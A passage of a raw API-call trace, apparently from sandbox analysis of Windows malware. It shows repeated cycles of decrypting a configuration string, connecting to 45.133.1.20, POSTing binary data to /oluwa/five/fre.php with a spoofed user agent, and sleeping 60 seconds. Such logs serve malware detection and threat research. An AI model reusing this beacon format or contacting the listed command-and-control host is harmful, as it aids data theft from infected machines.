dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0197.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x404) returned 0x4fc [0197.595] Sleep (dwMilliseconds=0xea60) [0197.596] GetProcessHeap () returned 0x6a0000 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0197.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0197.613] GetProcessHeap () returned 0x6a0000 [0197.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5868 [0197.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.614] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c5868, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.615] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.616] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.616] GetProcessHeap () returned 0x6a0000 [0197.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5868 | out: hHeap=0x6a0000) returned 1 [0197.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.618] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0197.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.620] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.622] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0197.622] GetProcessHeap () returned 0x6a0000 [0197.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.623] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.624] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.629] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.631] GetProcessHeap () returned 0x6a0000 [0197.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0197.631] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.631] GetProcessHeap () returned 0x6a0000 [0197.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0197.632] GetProcessHeap () returned 0x6a0000 [0197.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.632] GetProcessHeap () returned 0x6a0000 [0197.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0197.633] GetProcessHeap () returned 0x6a0000 [0197.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0197.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.634] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0197.648] GetProcessHeap () returned 0x6a0000 [0197.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0197.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.649] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.651] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.652] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.652] GetProcessHeap () returned 0x6a0000 [0197.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0197.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.654] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0197.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.655] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.656] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0197.656] GetProcessHeap () returned 0x6a0000 [0197.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.657] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0197.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.658] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0197.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.659] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0197.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.663] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0197.663] GetProcessHeap () returned 0x6a0000 [0197.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0197.663] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0197.663] GetProcessHeap () returned 0x6a0000 [0197.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0197.663] socket (af=2, type=1, protocol=6) returned 0x500 [0197.664] connect (s=0x500, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0197.688] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0197.689] GetProcessHeap () returned 0x6a0000 [0197.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0197.689] GetProcessHeap () returned 0x6a0000 [0197.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0197.690] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.691] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.691] GetProcessHeap () returned 0x6a0000 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0197.691] GetProcessHeap () returned 0x6a0000 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.692] GetProcessHeap () returned 0x6a0000 [0197.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0197.692] GetProcessHeap () returned 0x6a0000 [0197.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0197.693] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.694] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.694] GetProcessHeap () returned 0x6a0000 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0197.694] GetProcessHeap () returned 0x6a0000 [0197.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.695] send (s=0x500, buf=0x6b5c98*, len=242, flags=0) returned 242 [0197.696] send (s=0x500, buf=0x6bb998*, len=159, flags=0) returned 159 [0197.696] GetProcessHeap () returned 0x6a0000 [0197.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0197.696] recv (in: s=0x500, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0197.765] GetProcessHeap () returned 0x6a0000 [0197.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0197.765] GetProcessHeap () returned 0x6a0000 [0197.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0197.766] GetProcessHeap () returned 0x6a0000 [0197.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0197.766] GetProcessHeap () returned 0x6a0000 [0197.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0197.766] closesocket (s=0x500) returned 0 [0197.767] GetProcessHeap () returned 0x6a0000 [0197.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0197.767] GetProcessHeap () returned 0x6a0000 [0197.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.767] GetProcessHeap () returned 0x6a0000 [0197.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0197.768] GetProcessHeap () returned 0x6a0000 [0197.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0197.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe48) returned 0x500 [0197.770] Sleep (dwMilliseconds=0xea60) [0197.771] GetProcessHeap () returned 0x6a0000 [0197.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0197.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.772] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0197.795] GetProcessHeap () returned 0x6a0000 [0197.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6a28 [0197.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.797] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b6a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0197.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.798] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.800] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.800] GetProcessHeap () returned 0x6a0000 [0197.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a28 | out: hHeap=0x6a0000) returned 1 [0197.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.802] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0197.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.803] CryptDestroyKey (hKey=0x6ad560) returned 1 [0197.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.804] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0197.804] GetProcessHeap () returned 0x6a0000 [0197.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.805] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.814] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.815] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.816] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.816] GetProcessHeap () returned 0x6a0000 [0197.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0197.816] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.816] GetProcessHeap () returned 0x6a0000 [0197.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0197.817] GetProcessHeap () returned 0x6a0000 [0197.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.818] GetProcessHeap () returned 0x6a0000 [0197.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0197.818] GetProcessHeap () returned 0x6a0000 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0197.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.830] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0197.841] GetProcessHeap () returned 0x6a0000 [0197.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0197.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.843] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.844] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.846] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.846] GetProcessHeap () returned 0x6a0000 [0197.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0197.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.848] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0197.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.849] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.851] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0197.851] GetProcessHeap () returned 0x6a0000 [0197.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.852] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0197.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.856] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0197.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.857] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0197.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.858] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0197.858] GetProcessHeap () returned 0x6a0000 [0197.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0197.858] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0197.858] GetProcessHeap () returned 0x6a0000 [0197.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0197.858] socket (af=2, type=1, protocol=6) returned 0x504 [0197.859] connect (s=0x504, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0197.886] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0197.886] GetProcessHeap () returned 0x6a0000 [0197.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0197.886] GetProcessHeap () returned 0x6a0000 [0197.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0197.888] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.891] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.891] GetProcessHeap () returned 0x6a0000 [0197.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0197.891] GetProcessHeap () returned 0x6a0000 [0197.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0197.891] GetProcessHeap () returned 0x6a0000 [0197.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0197.892] GetProcessHeap () returned 0x6a0000 [0197.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0197.892] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.893] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.893] GetProcessHeap () returned 0x6a0000 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0197.893] GetProcessHeap () returned 0x6a0000 [0197.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0197.894] send (s=0x504, buf=0x6b5c98*, len=242, flags=0) returned 242 [0197.895] send (s=0x504, buf=0x6bb998*, len=159, flags=0) returned 159 [0197.895] GetProcessHeap () returned 0x6a0000 [0197.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0197.895] recv (in: s=0x504, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0197.980] GetProcessHeap () returned 0x6a0000 [0197.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0197.980] GetProcessHeap () returned 0x6a0000 [0197.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0197.982] GetProcessHeap () returned 0x6a0000 [0197.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0197.982] GetProcessHeap () returned 0x6a0000 [0197.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0197.983] closesocket (s=0x504) returned 0 [0197.984] GetProcessHeap () returned 0x6a0000 [0197.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0197.984] GetProcessHeap () returned 0x6a0000 [0197.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.984] GetProcessHeap () returned 0x6a0000 [0197.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0197.985] GetProcessHeap () returned 0x6a0000 [0197.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0197.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8ac) returned 0x504 [0197.989] Sleep (dwMilliseconds=0xea60) [0197.990] GetProcessHeap () returned 0x6a0000 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0197.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 